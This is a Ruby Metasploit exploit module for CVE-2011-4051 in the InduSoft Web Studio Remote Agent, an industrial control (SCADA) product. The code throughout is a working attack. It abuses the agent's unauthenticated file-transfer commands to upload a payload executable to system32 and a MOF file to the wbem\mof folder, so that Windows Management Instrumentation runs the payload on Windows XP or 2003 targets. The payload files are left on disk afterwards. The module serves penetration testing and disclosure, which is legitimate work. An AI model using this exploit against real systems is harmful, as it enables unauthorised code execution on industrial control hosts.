Path: blob/master/modules/exploits/windows/scada/indusoft_webstudio_exec.rb
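##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  # Reply the Remote Agent returns when a group of chunks or the end-of-file
  # packet has been accepted.
  ACK = /\x02\x06\x10\x03/

  # Payload bytes carried by one chunk packet.
  CHUNK_SIZE = 1024

  # Chunk packets queued before a "send group" command has to be issued.
  GROUP_SIZE = 50

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InduSoft Web Studio Arbitrary Upload Remote Code Execution',
      'Description'    => %q{
          This module exploits a lack of authentication and authorization on the InduSoft
        Web Studio Remote Agent, that allows a remote attacker to write arbitrary files to
        the filesystem, by abusing the functions provided by the software.

          The module uses the Windows Management Instrumentation service to execute an
        arbitrary payload on vulnerable installations of InduSoft Web Studio on Windows pre
        Vista. It has been successfully tested on InduSoft Web Studio 6.1 SP6 over Windows
        XP SP3 and Windows 2003 SP2.
      },
      'Author'         =>
        [
          'Luigi Auriemma', # Vulnerability Discovery
          'juan vazquez'    # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-4051' ],
          [ 'OSVDB', '77179' ],
          [ 'BID', '50675' ],
          [ 'ZDI', '11-330' ]
        ],
      'Privileged'     => true,
      'Payload'        =>
        {
          'BadChars' => "",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP / 2003', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2011-11-04'))

    register_options(
      [
        Opt::RPORT(4322),
        # Both uploads land under this directory (system32 for the exe,
        # system32\wbem\mof for the MOF file); override it when the target's
        # Windows directory is not the default.
        OptString.new('WINDIR', [true, 'Windows directory on the target', 'C:\\WINDOWS'])
      ])
  end

  # Ask the Remote Agent for its application banner (command 0x14).
  #
  # Returns CheckCode::Appears for the 6.1 branch the module was tested
  # against, CheckCode::Detected for any other InduSoft Web Studio banner,
  # CheckCode::Unknown when no banner was read at all (a silent port is not
  # evidence of a patched host) and CheckCode::Safe otherwise.
  def check
    connect
    begin
      app_info = query_agent(0x14)
    ensure
      disconnect
    end

    return Exploit::CheckCode::Unknown if app_info.nil?

    if app_info =~ /InduSoft Web Studio v6\.1/
      Exploit::CheckCode::Appears
    elsif app_info =~ /InduSoft Web Studio/
      Exploit::CheckCode::Detected
    else
      Exploit::CheckCode::Safe
    end
  end

  # Write +contents+ to +filename+ on the target through the Remote Agent's
  # unauthenticated file-transfer commands.
  #
  # The exchange is: a "select destination" packet with the total size and
  # the target path, chunk packets of CHUNK_SIZE bytes, a "send group"
  # command after every GROUP_SIZE chunks (which must be ACKed before the
  # next group is queued), and an end-of-file packet carrying file times
  # and attributes. Chunk packets and group commands share one sequence
  # counter.
  #
  # Returns the agent's reply to the last packet sent (matches ACK on
  # success) or nil if nothing was read. The socket is closed before
  # returning, including when a chunk group is rejected mid-transfer.
  def upload_file(filename, contents)
    # Work on a binary copy so length and slicing are byte-based whatever
    # encoding the caller's string carries.
    payload = contents.b

    connect
    begin
      app_info = query_agent(0x14)
      unless app_info =~ /InduSoft Web Studio/
        print_warning("#{@peer} - InduSoft Web Studio hasn't been detected, trying to exploit anyway...")
      end

      os_info = query_agent(0x13)
      unless os_info =~ /WINXP/ || os_info =~ /WIN2K3/
        print_warning("#{@peer} - Exploitation through Windows Management Instrumentation service only works on windows pre-vista system, trying to exploit anyway...")
      end

      # Command => Select destination
      data = "\x02\x37"
      data << [payload.length].pack("V")   # Data length
      data << filename                     # File name to upload
      data << "\x09\x00\x30\x00\x00\x00"   # fixed trailer from the original capture; meaning not documented here
      data << "\x10\x03"                   # End of packet

      seq = 1   # sequence number shared by chunk packets and group commands
      sent = 0  # chunk packets queued so far; decides the next slice offset
      chunk = payload[sent * CHUNK_SIZE, CHUNK_SIZE]

      # String#[] yields "" (not nil) exactly at the end of the data, so one
      # empty chunk always precedes the end-of-file packet; this matches the
      # exchange the module was tested with and is deliberately kept.
      until chunk.nil?
        if seq % (GROUP_SIZE + 1) == 0
          data << "\x02\x2c"                  # Command => Send group of chunks
          data << dle_stuff([seq].pack("V"))  # Number of packets so far
          data << "\x10\x03"                  # End of packet

          sock.put(data)
          res = sock.get_once
          # Bail out with the agent's reply; the ensure below closes the socket.
          return res unless res =~ ACK

          seq += 1
          data = ""
        end

        data << "\x02\x2e"                            # Command => Chunk Data
        data << dle_stuff([seq].pack("V"))            # Chunk ID
        data << dle_stuff([chunk.length].pack("V"))   # Chunk Data length
        data << dle_stuff(chunk)                      # Chunk Data
        data << "\x10\x03"                            # End of packet

        sent += 1
        seq += 1
        chunk = payload[sent * CHUNK_SIZE, CHUNK_SIZE]
      end

      data << "\x02\x03"                  # Command => End of File
      data << dle_stuff([seq].pack("V"))  # Chunk ID
      data << rand_text_alpha(8)          # LastWriteTime
      data << rand_text_alpha(8)          # LastAccessTime
      data << rand_text_alpha(8)          # CreationTime
      data << "\x20\x00\x00\x00"          # FileAttributes => FILE_ATTRIBUTE_ARCHIVE (0x20)
      data << rand_text_alpha(1)
      data << "\x10\x03"                  # End of packet

      sock.put(data)
      sock.get_once
    ensure
      disconnect
    end
  end

  # Upload the payload executable and a MOF file referencing it under the
  # target's Windows directory; execution then relies on the WbemExec MOF
  # technique described in the module Description (pre-Vista only).
  #
  # Nothing here removes the two files afterwards: both remain on disk in
  # system32 and system32\wbem\mof once the session is established.
  def exploit
    @peer = "#{rhost}:#{rport}"
    windir = datastore['WINDIR']

    exe_name = rand_text_alpha(rand(10) + 5) + '.exe'
    mof_name = rand_text_alpha(rand(10) + 5) + '.mof'
    exe = generate_payload_exe
    mof = generate_mof(mof_name, exe_name)

    exe_path = "#{windir}\\system32\\#{exe_name}"
    print_status("#{@peer} - Uploading the exe payload to #{exe_path}")
    unless upload_file(exe_path, exe) =~ ACK
      print_error("#{@peer} - Error uploading the exe payload")
      return
    end
    print_good("#{@peer} - The exe payload has been uploaded successfully")

    mof_path = "#{windir}\\system32\\wbem\\mof\\#{mof_name}"
    print_status("#{@peer} - Uploading the mof file to #{mof_path}")
    unless upload_file(mof_path, mof) =~ ACK
      print_error("#{@peer} - Error uploading the mof file")
      return
    end
    print_good("#{@peer} - The mof file has been uploaded successfully")
  end

  private

  # Send a one-byte command to the connected agent and return whatever
  # sock.get_once yields (nil when no data comes back).
  def query_agent(cmd)
    sock.put([cmd].pack("C"))
    sock.get_once
  end

  # Double every 0x10 byte inside a field, as the original packets do for
  # IDs, lengths and chunk data (presumably DLE escaping, since "\x10\x03"
  # terminates a packet). The terminator itself is never escaped.
  def dle_stuff(field)
    field.gsub(/\x10/, "\x10\x10")
  end
end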